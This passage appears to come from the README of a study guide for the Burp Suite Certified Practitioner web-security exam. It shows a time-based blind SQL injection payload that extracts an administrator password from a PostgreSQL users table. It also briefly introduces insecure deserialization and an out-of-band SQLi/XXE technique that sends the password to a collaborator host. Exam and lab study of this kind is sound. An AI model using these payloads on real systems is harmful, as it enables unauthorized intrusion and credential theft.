botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 ;SELECT+CASE+WHEN+(username='administrator'+AND+SUBSTRING(password,§1§,1)='§a§')+THEN+pg_sleep(7)+ELSE+pg_sleep(0)+END+FROM+users--
 ```

+>Stage 3 of the Burp Practice exam admin portal require exploitation of an [insecure deserialization](#ysoserial) cookie value.

 ### Blind SQLi

 >Target is vulnerable to Out of band data exfiltration using Blind SQL exploitation query.
 In this case the trackingID cookie.
 Below is combination of SQL injection and XXE payload to exploit the vulnerability and send administrator password as DNS request to the collaborator service.